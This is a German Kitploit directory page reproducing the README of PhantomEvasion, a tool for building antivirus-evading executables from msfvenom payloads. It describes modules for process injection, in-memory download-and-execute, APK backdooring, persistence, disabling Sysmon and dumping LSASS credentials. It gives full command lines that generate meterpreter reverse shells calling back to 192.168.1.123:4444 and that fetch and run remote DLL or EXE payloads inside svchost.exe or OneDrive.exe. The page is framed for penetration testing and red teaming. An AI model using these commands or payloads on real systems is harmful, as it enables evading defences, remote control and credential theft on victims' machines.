Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PhantomEvasion — Python-basiertes Antivirus-Evasion-Tool, das nicht nachweisbare ausführbare Dateien aus msfvenom Payloads mit fortgeschrittenen Techniken wie Junkcode-Injektion, Verschlüsselung, Zertifikatsspoofing und mehreren Ausführungsmethoden generiert. | Kitploit
Tools/GitHubGitHub/esskumar/phantomevasion
Privilege EscalationExploit-FrameworksPayload-GenerierungPersistenzmechanismenShellcodePost-ExploitationPenetrationstestsRed Teaming
GitHubesskumar/phantomevasion

PhantomEvasion

Python-basiertes Antivirus-Evasion-Tool, das nicht nachweisbare ausführbare Dateien aus msfvenom Payloads mit fortgeschrittenen Techniken wie Junkcode-Injektion, Verschlüsselung, Zertifikatsspoofing und mehreren Ausführungsmethoden generiert.

171vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

PHANTOM EVASION 3.0

Phantom-Evasion ist ein Tool zur Umgehung von Antivirenprogrammen, geschrieben in Python (kompatibel mit Python und Python3), das in der Lage ist, (fast) vollständig unerkennbare ausführbare Dateien zu generieren, selbst mit den gängigsten x86-msfvenom-Payloads.

Die folgenden Betriebssysteme unterstützen offiziell die automatische Einrichtung:

  1. Kali Linux
  2. Parrot Security

Die folgenden Betriebssysteme unterstützen wahrscheinlich die automatische Einrichtung, erfordern jedoch eine manuelle Installation von metasploit-framework:

  1. OSX (getestet auf Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. andere Debian-Distributionen
  7. Centos
  8. Fedora
  9. Blackarch

Die folgenden Betriebssysteme erfordern eine manuelle Einrichtung:

  1. Windows 10

Einfach git clone oder herunterladen und den Phantom-Evasion-Ordner entpacken.

Einrichtung:

Automatische Einrichtung, öffne ein Terminal und führe aus:

root@kitploit:~
python3 phantom-evasion.py --setup

oder:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

oder starte Phantom-Evasion im interaktiven Modus und wähle Option 7.

Abhängigkeiten (nur für manuelle Einrichtung)

  1. metasploit-framework
  2. mingw-w64 (cygwin auf Windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

CMDLINE/INTERAKTIV:

  1. Starte Phantom-Evasion im interaktiven Modus:
root@kitploit:~
python3 phantom-evasion.py

oder:

root@kitploit:~
./phantom-evasion.py
  1. Um die Optionen des Befehlszeilenmodus zu sehen:
root@kitploit:~
python3 phantom-evasion.py --help

oder:

root@kitploit:~
./phantom-evasion.py --help

WINDOWS-Module

-Jedes Windows-Payload-C-Modul kann als EXE oder DLL/ReflectiveDLL kompiliert werden (unterstützt sowohl x86 als auch x64).

-Zufällige Junkcode-Injektion (Intensität, Häufigkeit und Reinjektionswahrscheinlichkeit können eingestellt werden) und Techniken zur Umgehung von Windows-Antivirenprogrammen (Häufigkeit kann eingestellt werden).

-Multibyte-Xor-/Vigenere-Verschlüsselung von Shellcode/Datei wird sowohl in Shellcode-Injektions- als auch in Download-Exec-Modulen unterstützt.

-Ntdll-UnhookAPI- und PEB-Prozess-Maskierungstechnik werden unterstützt.

-Vielfältige Ausführungsmodi werden unterstützt (sowohl lokal als auch remote).

-Vielfältige Speicherzuordnungsmodi für Payloads werden unterstützt (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

-Dynamisches Laden von Windows-APIs kann eingestellt werden.

-Zertifikatsspoofer und -signierer werden unterstützt.

-Ausführbare Datei strippen (https://en.wikipedia.org/wiki/Strip_(Unix))

Windows C Shellcode-Injektion

Msfvenom-Windows-Payloads und benutzerdefinierte Shellcodes werden unterstützt. Shellcode kann als Ressource gespeichert und zur Laufzeit mit der FindResource-API abgerufen werden.

Shellcode-Verschlüsselung wird unterstützt:

root@kitploit:~
1.keine

2.Multibyte-Xor

3.Doppelschlüssel-Multibyte-Xor

4.Vigenere

5.Doppelschlüssel-Vigenere
  1. Lokale Ausführungsmethode kann eine der folgenden sein:

    Thread

    APC

    Lokaler Speicherzuordnungsmodus kann einer der folgenden sein:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. Remote-Ausführungsmethode kann eine der folgenden sein:

    ThreadExecutionHijack (kurz TEH)

    Processinject (kurz PI)

    APCSpray (kurz APCS)

    EarlyBird (kurz EB)

    EntryPointHijack (kurz EPH)

    Remote-Speicherzuordnungsmodus kann einer der folgenden sein:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Windows Pure C meterpreter stager (C)

Pure-C-Meterpreter-Stager-Module (TCP/HTTP/HTTPS) kompatibel mit msfconsole und Cobalt Strike Beacon. (reverse_tcp/reverse_http/reverse_https)

Verwendung des Befehlszeilenmodus:

root@kitploit:~
reverse_tcp C-Stager ist WRT

reverse_http C-Stager ist WRH

reverse_https C-Stager ist WRS
  1. Lokale Ausführungsmethode kann eine der folgenden sein:

    Thread

    APC

    Lokaler Speicherzuordnungsmodus kann einer der folgenden sein:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Windows Download-Exec NoDiskWrite

Lade EXE/DLL von der angegebenen URL in den Speicher herunter und führe sie aus/lade sie in einen Remote-Prozess (ohne auf die Festplatte zu schreiben).

Verschlüsselter EXE/DLL-Download wird unterstützt:

root@kitploit:~
1.keine
                                 
2.Multibyte-Xor
                                 
3.Doppelschlüssel-Multibyte-Xor
                               
4.Vigenere
                                
5.Doppelschlüssel-Vigenere

Die verschlüsselte DLL/EXE wird als originalfilename + "crypt" + ".dll" oder ".exe" gespeichert – dies ist die Datei, die heruntergeladen werden soll.

  1. Windows DownloadExecExe NoDiskWrite (WDE im Befehlszeilenmodus):

    Remote-Ausführungsmethode kann eine der folgenden sein:

    ProcessHollowing (kurz PH)

  2. Windows DownloadExecDll NoDiskWrite (WDD im Befehlszeilenmodus):

    Remote-Lademethode kann eine der folgenden sein:

    ReflectiveDll (kurz RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (kurz MM) ---> nur x86

LINUX-PAYLOADS

Linux Shellcode-Injektionsmodul (C)

Msfvenom-Linux-Payloads und benutzerdefinierte Shellcodes werden unterstützt.

ANDROID-PAYLOADS

  1. Android Msfvenom Obfuscate Backdoor:

    Verschleiere Msfvenom-Payloads und baue sie mit apktool neu (smali/baksmali). Der verschleierte Payload kann verwendet werden, um gutartige APK-Dateien zu backdoorieren.

PERSISTENZ-Module

  1. Windows Persistence RegCreateKeyExW Registry-Key hinzufügen (C) Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden, wobei der vollständige Pfad zur Datei, die zum Start hinzugefügt werden soll, als Argument angegeben wird.

  2. Windows Persistence REG Registry-Key hinzufügen (CMD) Dieses Modul erzeugt Persistenz-Befehlszeilen-Payloads (Hinzufügen eines Registry-Keys über REG.exe).

  3. Windows Persistence Keep Process Alive (C) Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden. Verwendet CreateToolSnapshoot, ProcessFirst und ProcessNext, um alle X Sekunden zu prüfen, ob ein bestimmter Prozess läuft (falls nicht, wird ein neuer Prozess mit der WinExec-API gestartet).

  4. Windows Persistence Schtasks (CMD)

    Dieses Modul erzeugt Persistenz-Befehlszeilen-Payloads (mit Schtasks.exe).

  5. Windows Persistence Create Service (CMD)

    Dieses Modul erzeugt Persistenz-Befehlszeilen-Payloads (mit sc.exe).

PRIVILEGE ESCALATION-Module

  1. Windows DuplicateTokenEx (C)

    Erstelle einen neuen Prozess mit einem Token, das von einem anderen Prozess geklont wurde. Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden.

POSTEXPLOITATION-Module

  1. Windows Unload Sysmon (C) Entlade den Sysmon-Treiber, was dazu führt, dass das System aufhört, Sysmon-Ereignisprotokolle aufzuzeichnen. Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden.

  2. Windows Unload Sysmon (CMD) Entlade den Sysmon-Treiber, was dazu führt, dass das System aufhört, Sysmon-Ereignisprotokolle aufzuzeichnen.

  3. Windows Attrib Datei verstecken (CMD) Verwende attrib, um eine Datei zu verstecken.

  4. Windows SetFileAttribute versteckt (C) Verstecke eine Datei mit der SetFileAttribute-API. Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden.

  5. Windows DumpLsass (C) Dump Lsass mit der MiniWriteDumpWrite-API. Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden.

  6. Windows DumpLsass (CMD)

    Dump Lsass über die Befehlszeile.

Beispiele für den Phantom-Evasion-Befehlszeilenmodus:

  1. Windows Shellcode-Injektion, Ausgabe als signierte EXE mit gefälschtem HTTPS-Zertifikat, lokale Ausführungsmethode: Thread, Speicher: Virtual_RWX, Verschlüsselung: Vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. Windows x64 Shellcode-Injektion, Ausgabe als reflective DLL, Remote-Ausführungsmethode: ProcessInject (PI), Speicher: Virtual_RW/RX, Zielprozess: SkypeApp.exe, Verschlüsselung: Doppelschlüssel-Xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. Windows x64 Shellcode-Injektion, Ausgabe als gestrippte DLL, Shellcode als Ressource gespeichert, Remote-Ausführungsmethode: EarlyBird (EB), Speicher: Virtual_RW/RX, Zielprozess: svchost.exe, Verschlüsselung: Xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. Windows x64 reverse-https-Stager, Ausgabe als gestrippte DLL, lokale Ausführungsmethode: Thread, Speicher: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. Windows x86 downloadexec DLL, Ausgabe als gestrippte EXE, Remote-Ausführungsmethode: ManualMap (MM), Zielprozess: OneDrive.exe, Downloadgröße 1000000 Bytes
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. Windows x64 downloadexec EXE, Ausgabe als gestrippte reflective DLL, Remote-Ausführungsmethode: ProcessHollowing (PH), Zielprozess: svchost.exe, Downloadgröße 1000000 Bytes
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Lizenz

GPLv3.0

Danksagungen und nützliche Ressourcen

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Tool herunterladen